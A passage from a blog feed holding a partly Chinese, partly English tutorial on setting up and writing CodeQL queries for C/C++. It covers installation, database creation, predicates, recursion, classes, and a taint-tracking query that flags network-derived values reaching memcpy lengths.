class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> cpp</span><br><span class="line"><span class="keyword">import</span> semmle.code.cpp.dataflow.TaintTracking</span><br><span class="line"><span class="keyword">import</span> DataFlow::PathGraph</span><br><span class="line"></span><br><span class="line"><span class="comment">// Class for expressions that byte-swap data received from the network</span></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">NetworkByteSwap</span> extends Expr&#123;</span><br><span class="line">    <span class="built_in">NetworkByteSwap</span>()    &#123;</span><br><span class="line">        <span class="built_in">exists</span>(MacroInvocation mi |</span><br><span class="line">            mi.<span class="built_in">getMacroName</span>().<span class="built_in">regexpMatch</span>(<span class="string">&quot;ntoh(s|l|ll)&quot;</span>) <span class="keyword">and</span></span><br><span class="line">            <span class="keyword">this</span> = mi.<span class="built_in">getExpr</span>()</span><br><span class="line">          )</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">// Taint-tracking configuration</span></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">Config</span> extends TaintTracking::Configuration&#123;</span><br><span class="line">    <span class="built_in">Config</span>() &#123; <span class="keyword">this</span> = <span class="string">&quot;NetworkToMemFuncLength&quot;</span>&#125;</span><br><span class="line">    <span class="comment">// Override isSource: this predicate holds for expressions that are data-flow sources.</span></span><br><span class="line">    <span class="keyword">override</span> predicate <span class="built_in">isSource</span>(DataFlow::Node source)&#123;</span><br><span class="line">        source.<span class="built_in">asExpr</span>() instanceof NetworkByteSwap</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// Override isSink: this predicate holds for expressions that are data-flow sinks.</span></span><br><span class="line">    <span class="keyword">override</span> predicate <span class="built_in">isSink</span>(DataFlow::Node sink)&#123;</span><br><span class="line">        <span class="built_in">exists</span>(FunctionCall c | c.<span class="built_in">getTarget</span>().<span class="built_in">getName</span>() = <span class="string">&quot;memcpy&quot;</span> <span class="keyword">and</span> sink.<span class="built_in">asExpr</span>() = c.<span class="built_in">getArgument</span>(<span class="number">2</span>))</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">// Query</span></span><br><span class="line">from Config cfg, DataFlow::PathNode source, DataFlow::PathNode sink</span><br><span class="line">where cfg.<span class="built_in">hasFlowPath</span>(source, sink)</span><br><span class="line">select sink, source, sink, <span class="string">&quot;Network byte swap flows to memcpy&quot;</span></span><br></pre></td></tr></table></figure></li></ul><h2 id="八、结语">八、Conclusion</h2><ul><li>Once we have studied CodeQL in more depth, we can use it to hunt for bugs that match a specific vulnerability pattern.</li><li>The above covers the basics of CodeQL. More advanced use means reading through the various QL APIs and combining them; the <a href="https://help.semmle.com/QL/learn-ql/cpp/introduce-libraries-cpp.html">CodeQL library for C and C++</a> documentation is the place to start.</li></ul>]]></content>
    
    
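    <summary type="html">&lt;h2 id=&quot;一、简介&quot;&gt;一、Introduction&lt;/h2&gt;
&lt;p&gt;CodeQL is a semantic code analysis engine that can scan a codebase for vulnerabilities. With CodeQL you can query code as if it were data: write a query to find every variant of a vulnerability and fix them, and share your queries with others.&lt;/p&gt;</summary>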
    
    
    
    <category term="天问之路" scheme="https://kiprey.github.io/categories/%E5%A4%A9%E9%97%AE%E4%B9%8B%E8%B7%AF/"/>
    
    
    <category term="CodeQL" scheme="https://kiprey.github.io/tags/CodeQL/"/>
    
  </entry>
  
  <entry>
    <title>Getting Started with CodeQL</title>
    <link href="https://kiprey.github.io/2020/12/CodeQL-setup/"/>
    <id>https://kiprey.github.io/2020/12/CodeQL-setup/</id>
    <published>2020-12-06T07:24:31.000Z</published>
    <updated>2025-11-24T03:59:39.783Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一、简介">一、Introduction</h2><p>CodeQL is a semantic code analysis engine that can scan a codebase for vulnerabilities. With CodeQL you can query code as if it were data: write a query to find every variant of a vulnerability and fix them, and share your queries with others.</p><span id="more"></span><p>This article is based mainly on the official documentation, the <a href="https://help.semmle.com/QL/ql-handbook/index.html#">QL language reference</a>.</p><h2 id="二、环境搭建">二、Environment Setup</h2><blockquote><p>The setup as a whole follows <a href="https://paper.seebug.org/1078/">代码分析引擎 CodeQL 初体验</a>.</p></blockquote><ul><li><p>First, download the <code>CodeQL CLI</code> binaries and install them.</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Download codeql.zip</span></span><br><span class="line">wget https://github.com/github/codeql-cli-binaries/releases/latest/download/codeql.zip</span><br><span class="line"><span class="comment"># Unpack it</span></span><br><span class="line">unzip codeql.zip</span><br><span class="line"><span class="comment"># Add codeql to PATH (assumes the archive was unpacked under /usr/class; adjust the path for your machine)</span></span><br><span class="line"><span class="built_in">echo</span> <span class="string">&quot;export PATH=\$PATH:/usr/class/codeql&quot;</span> &gt;&gt; ~/.zshrc</span><br><span class="line"><span class="built_in">source</span> ~/.zshrc</span><br></pre></td></tr></table></figure></li><li><p>Since this is an introduction, the starter workspace is all we need, so run the following command.</p><blockquote><p>Workspace setup reference: <a href="https://help.semmle.com/codeql/codeql-for-vscode/procedures/setting-up.html#using-the-starter-workspace">Using the starter workspace</a></p></blockquote><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">git <span class="built_in">clone</span> --recursive 
git@github.com:github/vscode-codeql-starter.git</span><br></pre></td></tr></table></figure><blockquote><p>注意：该工作区内含了QL库，因此一定要使用递归方式来下拉工作区代码。</p><p>递归方式下拉该仓库后，我们不需要再下拉<code>https://github.com/Semmle/ql</code>这个库了。</p></blockquote><p>如果觉得下拉很慢，可以挂个代理</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 设置代理</span></span><br><span class="line">git config --global http.proxy &lt;Protocol&gt;://&lt;IP&gt;:&lt;PORT&gt;</span><br><span class="line"><span class="comment"># 取消代理</span></span><br><span class="line">git config --global --<span class="built_in">unset</span> http.proxy</span><br></pre></td></tr></table></figure></li><li><p>最后，我们还需要在VScode中下载CodeQL的插件——<a href="https://marketplace.visualstudio.com/items?itemName=GitHub.vscode-codeql">Visual Studio Code Marketplace</a>。</p><p>插件下载完成后，还需要在vscode中设置一下<code>Code QL -- Cli: Executable Path</code>为刚刚下载下来的<code>codeql</code>二进制文件执行路径。</p></li><li><p>上述操作完成后，我们需要先建立一个AST数据库，后续的查询操作等都是在该数据库中完成。</p><p>以C++代码为例，我们可以使用如下命令来建立一个数据库</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">codeql database create &lt;database-folder&gt; --language=cpp --<span class="built_in">command</span>=&lt;prefix <span class="built_in">command</span>&gt;</span><br></pre></td></tr></table></figure><blockquote><p>如果省略<code>--command</code>参数，则codeQL会自动检测并使用自己的工具来构建。</p><p>但还是强烈推荐使用自己自定义的参数，尤其是大项目时。</p></blockquote><p>以构建chrome为例，由于chrome项目过于庞大，因此我们只能针对某个模块来进行分析。</p><p>于是我们可以进行如下操作</p><ul><li><p>先完整编译一个chromium，release不带符号即可。</p></li><li><p>进入obj目录，将目标模块的obj删除。</p></li><li><p>执行以下命令，重新编译该模块并构建数据库即可。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span 
class="line">gn gen out/ql &amp;&amp; codeql database create &lt;targetFolder&gt; --language=cpp --command=<span class="string">&#x27;ninja -C out/ql chrome&#x27;</span></span><br></pre></td></tr></table></figure></li></ul><p>Once built, the database has the following directory layout:</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">- log\                # log output</span><br><span class="line">- db-cpp\             # the compiled database</span><br><span class="line">- src.zip             # the source code that was compiled</span><br><span class="line">- codeql-database.yml # database configuration</span><br></pre></td></tr></table></figure></li><li><p>Then, in VSCode:</p><ul><li>Click “Open Workspace” to open the <code>vscode-codeql-starter</code> workspace cloned earlier.</li><li>In the CodeQL extension, open the database that was just generated.</li><li>Write your own CodeQL query and save it under <code>vscode-codeql-starter\codeql-custom-queries-cpp</code>, so that imported modules resolve correctly.</li><li>Open the query in VSCode, then click <code>Run on queue</code> in the CodeQL extension to start the query.</li></ul></li><li><p>To view the AST of a file, right-click inside the source file and choose <code>CodeQL: View AST</code>. The first run is slow; expect to wait around ten minutes.</p></li></ul><blockquote><p>Reference for using the extension: <a href="https://help.semmle.com/codeql/codeql-for-vscode/procedures/using-extension.html">Analyzing projects with CodeQL</a></p></blockquote><h2 id="三、基本语法">三、Basic Syntax</h2><blockquote><p>The basic syntax is explained alongside QL code.</p></blockquote><ul><li><p>This query outputs every empty block statement (<code>BlockStmt</code>, a brace-delimited block; not a basic block in the control-flow sense).</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// First, import a package from the QL library</span></span><br><span class="line"><span class="keyword">import</span> cpp</span><br><span class="line"><span class="comment">// 
Range over every BlockStmt, i.e. every block statement</span></span><br><span class="line">from BlockStmt b</span><br><span class="line"><span class="comment">// Keep only the blocks that contain zero statements (the empty blocks)</span></span><br><span class="line">where b.<span class="built_in">getNumStmt</span>() = <span class="number">0</span></span><br><span class="line"><span class="comment">// Output each empty block together with the message string</span></span><br><span class="line">select b, <span class="string">&quot;This is an empty block.&quot;</span></span><br></pre></td></tr></table></figure></li><li><p>The following QL code finds where certain macros are defined.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> cpp</span><br><span class="line"></span><br><span class="line">from Macro m</span><br><span class="line">where m.<span class="built_in">getName</span>() = <span class="string">&quot;_LIBCPP_NO_CFI&quot;</span></span><br><span class="line">  <span class="keyword">or</span> m.<span class="built_in">getName</span>() = <span class="string">&quot;_GLIBC_LIKELY&quot;</span></span><br><span class="line">select m,<span class="string">&quot;macro&quot;</span></span><br></pre></td></tr></table></figure></li><li><p>This query finds the function with a given name. Note that it selects the <code>Function</code> itself, not the places where it is called.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> cpp</span><br><span class="line"></span><br><span class="line">from Function f</span><br><span class="line">where f.<span class="built_in">getName</span>() = <span class="string">&quot;memcpy&quot;</span></span><br><span class="line">select f, <span class="string">&quot;a function 
named memcpy&quot;</span></span><br></pre></td></tr></table></figure><p>这并不稀奇，但关键是下一个ql代码</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> cpp</span><br><span class="line"></span><br><span class="line">from FunctionCall call, Function func</span><br><span class="line">where</span><br><span class="line">    call.<span class="built_in">getTarget</span>() = func <span class="keyword">and</span></span><br><span class="line">    func.<span class="built_in">getName</span>() = <span class="string">&quot;memcpy&quot;</span></span><br><span class="line">select call,<span class="string">&quot;func named memcpy and called&quot;</span></span><br></pre></td></tr></table></figure><p><code>FunctionCall</code>将会涵盖所有的函数调用，因此我们可以通过该对象来获取特定函数被调用的位置。</p></li></ul><blockquote><p>对于所有的类和函数，都可以通过ctrl+右键的形式来查看其源码来了解更多信息。</p></blockquote><h2 id="四、高级语法">四、高级语法</h2><h3 id="1-谓词">1. 谓词</h3><h4 id="a-概述">a. 
概述</h4><ul><li><p>在CodeQL中，函数并不叫“函数”，叫做<code>Predicates</code>（谓词）。为了便于说明，下文中笔者可能会混用<strong>函数</strong>这个词语，即下文中的 <strong>“函数”</strong> 与 <strong>“谓词”</strong> 都是指代同一个内容。</p></li><li><p>在使用谓词前，我们需要定义一个谓词。谓词的格式如下</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">predicate <span class="title">name</span><span class="params">(type arg)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  statements</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>定义一个谓词需要以下四个部分</p><ul><li>关键词predicate（如果没有返回值），或者结果的类型（如果当前谓词内存在返回值）</li><li>谓词的名称</li><li>谓词的参数列表</li><li>谓词主体</li></ul></li></ul><h4 id="b-无返回值的谓词">b. 无返回值的谓词</h4><ul><li><p>无返回值的谓词以<code>predicate</code>关键词开头。若传入的值满足谓词主体中的逻辑，则该谓词将保留该值。</p></li><li><p>无返回值谓词的使用范围较小，但仍然在某些情况下扮演了很重要的一个角色，具体功能将在下文中逐渐讲解。</p></li><li><p>需要注意的是，下例中的参数<code>i</code>是一个<strong>数据集合</strong>，而不是单个数值。</p></li><li><p>举一个简单的例子</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">predicate <span class="title">isSmall</span><span class="params">(<span class="type">int</span> i)</span> </span>&#123;</span><br><span class="line">  i in [<span class="number">1</span> .. 
<span class="number">9</span>]</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function">from <span class="type">int</span> i </span></span><br><span class="line"><span class="function">where <span class="title">isSmall</span><span class="params">(i)</span> <span class="comment">// 将整数集合i从无限大的数据集合，限制至1-9</span></span></span><br><span class="line"><span class="function">select i</span></span><br><span class="line"><span class="function"><span class="comment">// 输出 1-9的数字</span></span></span><br></pre></td></tr></table></figure><p><code>isSmall(i)</code>会使集合<code>i</code>只保留1至9之间的整数，其余不符合条件的值将会被舍弃。</p></li></ul><h4 id="c-带返回值的谓词">c. 带返回值的谓词</h4><ul><li><p>当我们需要将某些结果从谓词中返回时，与C/C++的return语句不同的是，谓词使用的是一个特殊变量<code>result</code>。</p></li><li><p>举个简单例子</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span> <span class="title">getSuccessor</span><span class="params">(<span class="type">int</span> i)</span> </span>&#123;</span><br><span class="line">  <span class="comment">// 若传入的i位于1-9内，则返回i+1</span></span><br><span class="line">  <span class="comment">// 注意这个语法不能用C++语法来理解</span></span><br><span class="line">  result = i + <span class="number">1</span> <span class="keyword">and</span> i in [<span class="number">1</span> .. 
<span class="number">9</span>]</span><br><span class="line">&#125;</span><br><span class="line">  </span><br><span class="line">select <span class="built_in">getSuccessor</span>(<span class="number">3</span>)  <span class="comment">// 输出4</span></span><br><span class="line">select <span class="built_in">getSuccessor</span>(<span class="number">33</span>) <span class="comment">// 不输出任何信息</span></span><br></pre></td></tr></table></figure><blockquote><p>谓词主体的语法只是为了表述逻辑之间的关系，因此务必不要用一般编程语言的语法来理解。</p></blockquote></li><li><p>在谓词主体中，<code>result</code>变量可以像一般变量一样正常使用，唯一不同的是这个变量内的数据将会被返回。</p><p>同时，<strong>谓词可能返回多个结果，或者根本不返回任何结果</strong>。以下是一个简单的例子。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">string <span class="title">getANeighbor</span><span class="params">(string country)</span> </span>&#123;</span><br><span class="line">    country = <span class="string">&quot;France&quot;</span> <span class="keyword">and</span> result = <span class="string">&quot;Belgium&quot;</span></span><br><span class="line">    <span class="keyword">or</span></span><br><span class="line">    country = <span class="string">&quot;France&quot;</span> <span class="keyword">and</span> result = <span class="string">&quot;Germany&quot;</span></span><br><span class="line">    <span class="keyword">or</span></span><br><span class="line">    country = <span class="string">&quot;Germany&quot;</span> <span class="keyword">and</span> result = <span class="string">&quot;Austria&quot;</span></span><br><span class="line">    <span 
class="keyword">or</span></span><br><span class="line">    country = <span class="string">&quot;Germany&quot;</span> <span class="keyword">and</span> result = <span class="string">&quot;Belgium&quot;</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">select <span class="built_in">getANeighbor</span>(<span class="string">&quot;France&quot;</span>)</span><br><span class="line"><span class="comment">// 返回两个条目，&quot;Belgium&quot;与&quot;Germany&quot;</span></span><br></pre></td></tr></table></figure></li><li><p>谓词所描述的数据集合必须是<strong>有限大小</strong>的，不允许描述无限大小的数据集合。举个例子</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 该谓词将使得编译报错</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">multiplyBy4</span><span class="params">(<span class="type">int</span> i)</span> </span>&#123;</span><br><span class="line">  <span class="comment">// i是一个数据集合，此时该集合可能是**无限大小**</span></span><br><span class="line">  <span class="comment">// result集合被设置为i*4，意味着result集合的大小有可能也是**无限大小**</span></span><br><span class="line">  result = i * <span class="number">4</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>但如果我们仍然需要定义这类函数，则必须<strong>限制集合数据大小</strong>，同时添加一个<code>bindingset</code>标注。以谓词<code>plusOne</code>为例，该标注声明：只要<code>x</code>或<code>y</code>中有一个被绑定到有限的数据集合，该谓词所包含的数据集合就是有限的。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td 
class="code"><pre><span class="line">bindingset[x] bindingset[y]</span><br><span class="line"><span class="function">predicate <span class="title">plusOne</span><span class="params">(<span class="type">int</span> x, <span class="type">int</span> y)</span> </span>&#123;</span><br><span class="line">  x + <span class="number">1</span> = y</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">from <span class="type">int</span> x, <span class="type">int</span> y</span><br><span class="line">where y = <span class="number">42</span> <span class="keyword">and</span> <span class="built_in">plusOne</span>(x, y)</span><br><span class="line">select x, y</span><br></pre></td></tr></table></figure></li></ul><h4 id="d-递归">d. 递归</h4><ul><li><p>谓词类似于函数，可以<strong>递归调用</strong>。</p><p>同时<code>result</code>变量可以按照任何方式来表达与其他变量之间的关系，因此<code>result</code>变量的赋值不局限于使用<code>=</code>符号。</p><p>以下是一个简单例子</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">string <span class="title">getANeighbor</span><span class="params">(string country)</span> </span>&#123;</span><br><span class="line">  country = <span class="string">&quot;France&quot;</span> <span class="keyword">and</span> result = <span class="string">&quot;Belgium&quot;</span></span><br><span class="line">  <span class="keyword">or</span></span><br><span class="line">  country = <span class="string">&quot;France&quot;</span> <span class="keyword">and</span> result = <span 
class="string">&quot;Germany&quot;</span></span><br><span class="line">  <span class="keyword">or</span></span><br><span class="line">  country = <span class="string">&quot;Germany&quot;</span> <span class="keyword">and</span> result = <span class="string">&quot;Austria&quot;</span></span><br><span class="line">  <span class="keyword">or</span></span><br><span class="line">  country = <span class="string">&quot;Germany&quot;</span> <span class="keyword">and</span> result = <span class="string">&quot;Belgium&quot;</span></span><br><span class="line">  <span class="keyword">or</span></span><br><span class="line">  country = <span class="built_in">getANeighbor</span>(result)</span><br><span class="line">&#125;</span><br><span class="line">select <span class="built_in">getANeighbor</span>(<span class="string">&quot;Austria&quot;</span>)</span><br><span class="line"><span class="comment">// 输出Germany</span></span><br></pre></td></tr></table></figure></li><li><p>传递闭包</p><blockquote><p>谓词的传递闭包是递归谓词，它的结果是通过重复应用原始的谓词来获得的。</p><p>特别要注意的是，原始谓词必须有两个参数(可能包括this或result值)，并且这些参数必须具有兼容的类型。</p><p>由于传递闭包是递归的一种常见形式，因此QL有两个有用的缩写，分别是<code>+</code>和<code>*</code></p></blockquote><ul><li><p><strong>传递闭包(+)</strong></p><p>如果要一次或多次的应用特定谓词，请在谓词后添加一个<code>+</code>符号。</p><p>举个例子，假设定义了一个带有成员谓词<code>getAParent()</code>的<code>Person</code>类，其中<code>p.getAParent()</code>会返回p的所有父母。而<code>p.getAParent+()</code>将会返回p的父母、p的父母的父母、等等等等。</p><p>使用<code>+</code>来表示通常会比显式定义递归谓词更简单，<code>p.getAParent+()</code>等价于以下递归谓词：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">Person <span class="title">getAnAncestor</span><span class="params">()</span> </span>&#123;</span><br><span class="line">  result = <span class="keyword">this</span>.<span 
class="built_in">getAParent</span>()</span><br><span class="line">  <span class="keyword">or</span></span><br><span class="line">  result = <span class="keyword">this</span>.<span class="built_in">getAParent</span>().<span class="built_in">getAnAncestor</span>()</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p><strong>自反传递闭包(*)</strong></p><p>这个类似于上面的传递闭包。与之前所不同的是，使用<code>*</code>表示将谓词应用零次至多次。</p><p>例如：<code>p.getAParent*()</code>将会输出p的祖先，或者p本身。该谓词调用等价于以下谓词:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">Person <span class="title">getAnAncestor2</span><span class="params">()</span> </span>&#123;</span><br><span class="line">  result = <span class="keyword">this</span></span><br><span class="line">  <span class="keyword">or</span></span><br><span class="line">  result = <span class="keyword">this</span>.<span class="built_in">getAParent</span>().<span class="built_in">getAnAncestor2</span>()</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li></ul></li></ul><blockquote><p>参考：<a href="https://help.semmle.com/QL/ql-handbook/predicates.html">Predicates - QL language reference</a></p></blockquote><h3 id="2-类">2. 
类</h3><ul><li><p>以上面ql中的各种类为例（例如Function类），这些类的设计将特定一类的代码归结为一处，以便于后续查询的使用。而如果我们需要自定义特定的类，那该怎么做呢？</p><blockquote><p>CodeQL中的类，<strong>并不意味着建立一个新的对象</strong>，而只是表示特定一类的数据集合，请注意区分。</p></blockquote></li><li><p>定义一个类，需要以下四个部分</p><ul><li><p>使用关键字<code>class</code></p></li><li><p>起一个类名，其中类名必须是首字母大写的。</p></li><li><p>确定是从哪个类中派生出来的</p><blockquote><p>使用的基类，除了cpp包中定义的各种类以外，还包括基本类型，即<code>boolean</code>、<code>float</code>、<code>int</code>、<code>string</code>以及<code>date</code>。</p></blockquote></li><li><p>类的主体</p></li></ul></li><li><p>以下是一个简单的例子，这个例子是官方的一个样例。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">class</span> <span class="title class_">OneTwoThree</span> extends <span class="type">int</span> &#123;</span><br><span class="line">  <span class="built_in">OneTwoThree</span>() &#123; <span class="comment">// characteristic predicate</span></span><br><span class="line">    <span class="keyword">this</span> = <span class="number">1</span> <span class="keyword">or</span> <span class="keyword">this</span> = <span class="number">2</span> <span class="keyword">or</span> <span class="keyword">this</span> = <span class="number">3</span></span><br><span class="line">  &#125;</span><br><span class="line"> </span><br><span class="line">  string <span class="built_in">getAString</span>() &#123; <span class="comment">// member 
predicate</span></span><br><span class="line">    result = <span class="string">&quot;One, two or three: &quot;</span> + <span class="keyword">this</span>.<span class="built_in">toString</span>()</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  predicate <span class="built_in">isEven</span>() &#123; <span class="comment">// member predicate</span></span><br><span class="line">    <span class="keyword">this</span> = <span class="number">2</span></span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">from OneTwoThree i </span><br><span class="line">where i = <span class="number">1</span> <span class="keyword">or</span> i.<span class="built_in">getAString</span>() = <span class="string">&quot;One, two or three: 2&quot;</span></span><br><span class="line">select i</span><br><span class="line"><span class="comment">// 输出1和2</span></span><br></pre></td></tr></table></figure><ul><li><p><strong>特征谓词</strong>类似于C++中的类构造函数，它将会进一步限制当前类所表示数据的集合。例如上面的特征谓词</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">OneTwoThree</span>() &#123; <span class="comment">// characteristic predicate</span></span><br><span class="line">  <span class="keyword">this</span> = <span class="number">1</span> <span class="keyword">or</span> <span class="keyword">this</span> = <span class="number">2</span> <span class="keyword">or</span> <span class="keyword">this</span> = <span class="number">3</span></span><br><span 
class="line">&#125;</span><br></pre></td></tr></table></figure><p>它将数据集合从原先的<code>int</code>集，进一步限制至1-3这个范围。</p><p><code>this</code>变量表示的是当前类中所包含的数据集合。与<code>result</code>变量类似，<code>this</code>同样是用于表示数据集合之间的关系。</p></li><li><p>在特征谓词中，比较常用的一个关键字是<a href="https://help.semmle.com/QL/ql-handbook/formulas.html#exists">exists</a>。该关键字的语法如下</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">exists</span>(&lt;variable declarations&gt; | &lt;formula&gt;)</span><br><span class="line"><span class="comment">// 以下两个exists所表达的意思等价。</span></span><br><span class="line"><span class="built_in">exists</span>(&lt;variable declarations&gt; | &lt;formula <span class="number">1</span>&gt; | &lt;formula <span class="number">2</span>&gt;)</span><br><span class="line"><span class="built_in">exists</span>(&lt;variable declarations&gt; | &lt;formula <span class="number">1</span>&gt; <span class="keyword">and</span> &lt;formula <span class="number">2</span>&gt;)</span><br></pre></td></tr></table></figure><p>这个关键字会引入一些新的临时变量。只要这些变量存在至少一组取值可以使formula成立，整个<code>exists</code>公式就成立。</p><p>一个简单的例子</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> cpp</span><br><span 
class="line"></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">NetworkByteSwap</span> extends Expr&#123;</span><br><span class="line">    <span class="built_in">NetworkByteSwap</span>()</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="comment">// 对于MacroInvocation这个大类的数据集合来说，</span></span><br><span class="line">        <span class="built_in">exists</span>(MacroInvocation mi |</span><br><span class="line">            <span class="comment">// 如果存在宏调用，其宏名称满足特定正则表达式</span></span><br><span class="line">            mi.<span class="built_in">getMacroName</span>().<span class="built_in">regexpMatch</span>(<span class="string">&quot;ntoh(s|l|ll)&quot;</span>) <span class="keyword">and</span></span><br><span class="line">            <span class="comment">// 将这类数据保存至当前类中</span></span><br><span class="line">            <span class="keyword">this</span> = mi.<span class="built_in">getExpr</span>()</span><br><span class="line">          )</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">from NetworkByteSwap n</span><br><span class="line">select n, <span class="string">&quot;Network byte swap&quot;</span></span><br></pre></td></tr></table></figure></li><li><p>与之对应的还有成员谓词，如下例所示</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span 